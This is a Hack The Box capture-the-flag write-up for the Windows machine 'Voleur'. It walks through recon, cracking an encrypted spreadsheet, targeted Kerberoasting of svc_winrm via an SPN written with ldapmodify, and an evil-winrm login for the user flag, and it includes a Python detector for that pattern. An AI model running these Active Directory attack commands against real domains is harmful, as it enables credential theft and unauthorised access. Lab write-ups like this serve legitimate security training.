
Voleur - Hack The Box

Platform: Windows

IP: 10.129.29.242

Difficulty: Medium

Author: NoSec



Recon

nmap -sV -sC -Pn 10.129.29.242
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 10:16 CEST
Nmap scan report for 10.129.29.242
Host is up (0.063s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 16:16:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2222/tcp open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

We receive a default username/password for the machine:

ryan.naylor / HollowOct31Nyt

Edit the hosts file:

sudo nano /etc/hosts
10.129.29.242       voleur.htb dc.voleur.htb

Kerberos tolerates only a few minutes of clock skew, and the nmap output shows the DC's clock (16:16Z) is hours away from ours (10:16 CEST), so synchronize time with the DC first:

sudo rdate -n dc.voleur.htb

Kerberos

Set krb5.conf:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    VOLEUR.HTB = {
        kdc = 10.129.29.242
        admin_server = 10.129.29.242
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Obtain Kerberos ticket (TGT):

kinit -c ryan.ccache ryan.naylor@VOLEUR.HTB

Kerberos SMB connection with Impacket:

export KRB5CCNAME=ryan.ccache
smbclient.py -k -no-pass -dc-ip 10.129.29.242 VOLEUR.HTB/ryan.naylor@dc.voleur.htb

Download the file Access_Review.xlsx:

get Access_Review.xlsx

Crack the file (office2john + john):

office2john Access_Review.xlsx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked password:

fo<pass>

Decrypt the workbook and dump its content as CSV:

pip install msoffcrypto-tool
msoffcrypto-tool Access_Review.xlsx decrypted.xlsx -p fo<pass>
xlsx2csv decrypted.xlsx access.csv
cat access.csv

File Contents

User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!


Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - [REDACTED]
svc_iis,,IIS Administration,P/W - [REDACTED]
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.

Using the svc_ldap credentials, add an SPN to the svc_winrm account so that it becomes Kerberoastable (targeted Kerberoasting):

cat > addspn.ldif << 'EOF'
dn: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: HTTP/voleur.htb
EOF

ldapmodify -x -H ldap://10.129.29.242 -D "svc_ldap@voleur.htb" -w "M1<pass>" -f addspn.ldif

Request the service ticket for the new SPN and crack it (with -k, GetUserSPNs authenticates with the svc_ldap Kerberos ticket found in KRB5CCNAME, so a TGT for svc_ldap must be in place):

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -k -request -request-user svc_winrm -dc-ip 10.129.29.242 -dc-host dc.voleur.htb voleur.htb/svc_ldap > tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFire<pass> (?)     
1g 0:00:00:05 DONE (2025-07-06 21:12) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AHANACK6978012..ADDRESS1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracked password:

AFire<pass>
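From the detection side, this added Python example (not part of the original writeup) correlates constructed Windows Security events to spot the pattern used above: an SPN written to a user object (event 5136) followed by an RC4 (etype 0x17, the "etype 23" john reported) service-ticket request for that SPN (event 4769). The event dicts, timestamps and client IP are simplified constructed samples, not the raw event XML schema.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events in a simplified dict form (not logs from the box): a 5136
# "directory service object modified" adding an SPN to a user object, then a 4769
# "service ticket requested" for that SPN with RC4 (0x17), i.e. the TGS john cracked.
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2025-07-06T21:05:10", "subject": "VOLEUR\\svc_ldap",
     "object": "CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb",
     "attribute": "servicePrincipalName", "value": "HTTP/voleur.htb", "op": "add"},
    {"id": 4769, "time": "2025-07-06T21:06:02", "account": "svc_ldap@VOLEUR.HTB",
     "service": "svc_winrm", "etype": "0x17", "client_ip": "10.10.14.5"},
    {"id": 4769, "time": "2025-07-06T21:06:03", "account": "svc_ldap@VOLEUR.HTB",
     "service": "DC$", "etype": "0x12", "client_ip": "10.10.14.5"},
]

CN_RE = re.compile(r"^CN=([^,]+)", re.IGNORECASE)

def _ts(ev):
    return datetime.fromisoformat(ev["time"])

def detect_kerberoast(events, window=timedelta(hours=24)):
    """Return findings for SPN writes on user objects, RC4 service tickets for
    user SPNs, and both combined within `window` (targeted Kerberoasting)."""
    findings = []
    spn_writes = {}  # sAMAccountName (lowercase) -> the 5136 event that added the SPN
    for ev in events:
        if ev["id"] == 5136 and ev["attribute"].lower() == "serviceprincipalname":
            m = CN_RE.match(ev["object"])
            target = (m.group(1) if m else ev["object"]).lower()
            if target.endswith("$"):
                continue  # computer objects carry SPNs legitimately
            spn_writes[target] = ev
            findings.append({"severity": "medium", "rule": "spn-write-user",
                             "detail": f'{ev["subject"]} {ev["op"]}: {ev["value"]} on {target}'})
        elif ev["id"] == 4769 and ev["etype"].lower() == "0x17":
            svc = ev["service"].lower()
            if svc.endswith("$") or svc == "krbtgt":
                continue  # RC4 tickets for a user-account SPN are the roasting pattern
            findings.append({"severity": "medium", "rule": "rc4-tgs-user-spn",
                             "detail": f'{ev["account"]} from {ev["client_ip"]} got RC4 ticket for {svc}'})
            w = spn_writes.get(svc)
            if w and timedelta(0) <= _ts(ev) - _ts(w) <= window:
                findings.append({"severity": "high", "rule": "targeted-kerberoast",
                                 "detail": f'SPN added to {svc} by {w["subject"]}, then roasted by {ev["account"]}'})
    return findings
```

Calling detect_kerberoast(SAMPLE_EVENTS) yields three findings; the AES (0x12) ticket for the DC$ account is not flagged. Enforcing AES-only on service accounts and alerting on servicePrincipalName writes to user objects removes both halves of this chain.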

Request a TGT for svc_winrm and point KRB5CCNAME at the saved ticket:

impacket-getTGT 'VOLEUR.HTB/SVC_WINRM:AFire<pass>'
export KRB5CCNAME=SVC_WINRM.ccache

Log in via evil-winrm and grab the user flag:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\svc_winrm> cd Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ls


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025  10:33 AM             34 user.txt

✅ User flag acquired!


πŸ” The root section is available only in our private Telegram group as long as the machine is active in Season 8.
πŸ‘‰ Join us for the full writeup, extra tips, and insider content:
πŸ“‘ https://t.me/nosecpwn)


β˜• invite me for a coffee so i don’t fall asleep writing the next writeup

πŸ’» support nosec